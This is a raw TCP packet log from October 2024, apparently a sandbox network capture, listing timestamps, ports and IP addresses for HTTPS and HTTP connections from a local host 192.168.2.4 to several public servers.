                Oct 7, 2024 03:25:50.654073000 CEST49737443192.168.2.418.224.107.108
                Oct 7, 2024 03:25:50.654119015 CEST4434973718.224.107.108192.168.2.4
                Oct 7, 2024 03:25:51.128885031 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:51.128925085 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:25:51.128993988 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:51.129486084 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:51.129497051 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:25:51.783880949 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:25:51.788117886 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:51.788130045 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:25:51.789661884 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:25:51.789738894 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:51.791380882 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:51.791479111 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:25:51.832245111 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:51.832252979 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:25:51.879112005 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:25:53.078183889 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:53.078285933 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:53.078397036 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:53.080470085 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:53.080504894 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:53.750463963 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:53.750710011 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:53.756952047 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:53.756982088 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:53.757456064 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:53.807948112 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:53.937553883 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:53.983417988 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.126312017 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.126456976 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.126609087 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.136714935 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.136790037 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.136827946 CEST49741443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.136847019 CEST44349741184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.242708921 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.242819071 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.242921114 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.243623972 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.243643999 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.736332893 CEST804973518.224.107.108192.168.2.4
                Oct 7, 2024 03:25:54.736665964 CEST4973580192.168.2.418.224.107.108
                Oct 7, 2024 03:25:54.878921986 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.879020929 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.880605936 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.880623102 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.880949020 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:54.882364035 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:54.923465967 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:55.153970957 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:55.154148102 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:55.154375076 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:55.155123949 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:55.155174971 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:55.155206919 CEST49742443192.168.2.4184.28.90.27
                Oct 7, 2024 03:25:55.155222893 CEST44349742184.28.90.27192.168.2.4
                Oct 7, 2024 03:25:56.182032108 CEST4973580192.168.2.418.224.107.108
                Oct 7, 2024 03:25:56.187002897 CEST804973518.224.107.108192.168.2.4
                Oct 7, 2024 03:26:01.679878950 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:01.679944992 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:01.680013895 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:02.176331997 CEST49740443192.168.2.4142.250.184.196
                Oct 7, 2024 03:26:02.176353931 CEST44349740142.250.184.196192.168.2.4
                Oct 7, 2024 03:26:03.203939915 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:03.204036951 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:03.204174042 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:03.205877066 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:03.205910921 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:03.991069078 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:03.991161108 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:03.994081020 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:03.994111061 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:03.994378090 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.033992052 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.551327944 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.595401049 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.805926085 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806001902 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806020975 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806060076 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806070089 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.806123972 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806194067 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806226969 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806230068 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.806230068 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.806262016 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.806276083 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806298018 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.806329012 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:04.806538105 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806651115 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:04.806788921 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:05.306250095 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:05.306315899 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:05.306348085 CEST49743443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:05.306365967 CEST443497434.245.163.56192.168.2.4
                Oct 7, 2024 03:26:06.573481083 CEST4972380192.168.2.493.184.221.240
                Oct 7, 2024 03:26:06.578608990 CEST804972393.184.221.240192.168.2.4
                Oct 7, 2024 03:26:06.578666925 CEST4972380192.168.2.493.184.221.240
                Oct 7, 2024 03:26:34.252096891 CEST4973680192.168.2.418.224.107.108
                Oct 7, 2024 03:26:34.257014036 CEST804973618.224.107.108192.168.2.4
                Oct 7, 2024 03:26:41.683938026 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:41.683980942 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:41.684032917 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:41.684387922 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:41.684405088 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:41.871439934 CEST804973618.224.107.108192.168.2.4
                Oct 7, 2024 03:26:41.871493101 CEST4973680192.168.2.418.224.107.108
                Oct 7, 2024 03:26:42.176408052 CEST4973680192.168.2.418.224.107.108
                Oct 7, 2024 03:26:42.181545019 CEST804973618.224.107.108192.168.2.4
                Oct 7, 2024 03:26:42.489267111 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.489343882 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.493724108 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.493743896 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.494134903 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.503844976 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.551408052 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.809003115 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.809037924 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.809056997 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.809166908 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.809195995 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.809823990 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.810019016 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.810065985 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.810085058 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.810096979 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.810118914 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.810120106 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.810182095 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.814148903 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.814150095 CEST49749443192.168.2.44.245.163.56
                Oct 7, 2024 03:26:42.814177036 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:42.814182997 CEST443497494.245.163.56192.168.2.4
                Oct 7, 2024 03:26:43.894516945 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:43.894567013 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:43.894767046 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:43.895045996 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:43.895057917 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.578632116 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.578743935 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.582441092 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.582454920 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.582827091 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.595652103 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.639403105 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.701292038 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.701356888 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.701397896 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.701446056 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.701508045 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.701550961 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.701574087 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.792664051 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.792697906 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.792751074 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.792783976 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.792804003 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.792825937 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.794265032 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.794290066 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.794329882 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.794337034 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.794374943 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.794389963 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.884660006 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.884690046 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.884738922 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.884759903 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.884795904 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.884814978 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.885504961 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.885529041 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.885565996 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.885570049 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.885603905 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.885616064 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.887367010 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.887396097 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.887425900 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.887430906 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.887481928 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.927853107 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.927881956 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.927920103 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.927934885 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.927952051 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.927975893 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.977549076 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.977572918 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.977618933 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.977633953 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.977653980 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.977683067 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.978178978 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.978199005 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.978230000 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.978235006 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.978265047 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.978275061 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.979137897 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.979159117 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.979197025 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.979202986 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.979245901 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.979264021 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.979896069 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.979923010 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.979959011 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.979964018 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.980000973 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.980021000 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.980938911 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.980957985 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.981000900 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.981005907 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:44.981060982 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.981076956 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:44.990818024 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.020292044 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.020353079 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.020370007 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.020411015 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.020442009 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.020462990 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.020463943 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.020493984 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.020523071 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.020657063 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.020709038 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.025814056 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.025852919 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.025881052 CEST49750443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.025895119 CEST4434975013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.188942909 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.188994884 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.189057112 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.189058065 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.189105988 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.189153910 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.190334082 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.190381050 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.190455914 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.190555096 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.190562963 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.190604925 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.191847086 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.191859007 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.191906929 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.192217112 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.192241907 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.192306995 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.192318916 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.192377090 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.192389965 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.192437887 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.192454100 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.192508936 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.192522049 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.831242085 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.832216024 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.832230091 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.833046913 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.833051920 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.833461046 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.833940983 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.833983898 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.835181952 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.835191965 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.851650953 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.852505922 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.852525949 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.853486061 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.853512049 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.859875917 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.860411882 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.860440969 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.861188889 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.861198902 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.870032072 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.870424032 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.870440960 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.871107101 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.871117115 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.931287050 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.931343079 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.931428909 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.931444883 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.931518078 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.931582928 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.931936979 CEST49751443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.931948900 CEST4434975113.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.935051918 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.935080051 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.935147047 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.935168982 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.935189962 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.936336040 CEST49756443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.936427116 CEST4434975613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.936595917 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.936619997 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.936633110 CEST49754443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.936639071 CEST4434975413.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.936645985 CEST49756443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.937916040 CEST49756443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.937949896 CEST4434975613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.941071033 CEST49757443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.941159010 CEST4434975713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.941246986 CEST49757443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.941603899 CEST49757443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.941646099 CEST4434975713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.953003883 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.953063965 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.953244925 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.953304052 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.953304052 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.953356981 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.953356981 CEST49752443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.953378916 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.953391075 CEST4434975213.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.959095001 CEST49758443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.959156036 CEST4434975813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.959482908 CEST49758443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.959753990 CEST49758443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.959794998 CEST4434975813.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.962999105 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.963068008 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.963119984 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.963658094 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.963675022 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.963701963 CEST49753443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.963706970 CEST4434975313.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.966618061 CEST49759443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.966636896 CEST4434975913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.966805935 CEST49759443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.966953039 CEST49759443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.966964960 CEST4434975913.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.972062111 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.972199917 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.972259998 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.972635031 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.972635031 CEST49755443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.972642899 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.972651958 CEST4434975513.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.975792885 CEST49760443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.975812912 CEST4434976013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:45.975887060 CEST49760443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.976161957 CEST49760443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:45.976183891 CEST4434976013.107.246.60192.168.2.4
                Oct 7, 2024 03:26:46.586220980 CEST4434975613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:46.590394020 CEST49756443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:46.590435028 CEST4434975613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:46.591492891 CEST49756443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:46.591499090 CEST4434975613.107.246.60192.168.2.4
                Oct 7, 2024 03:26:46.604266882 CEST4434975713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:46.604743958 CEST49757443192.168.2.413.107.246.60
                Oct 7, 2024 03:26:46.604783058 CEST4434975713.107.246.60192.168.2.4
                Oct 7, 2024 03:26:46.605195999 CEST49757443192.168.2.413.107.246.60
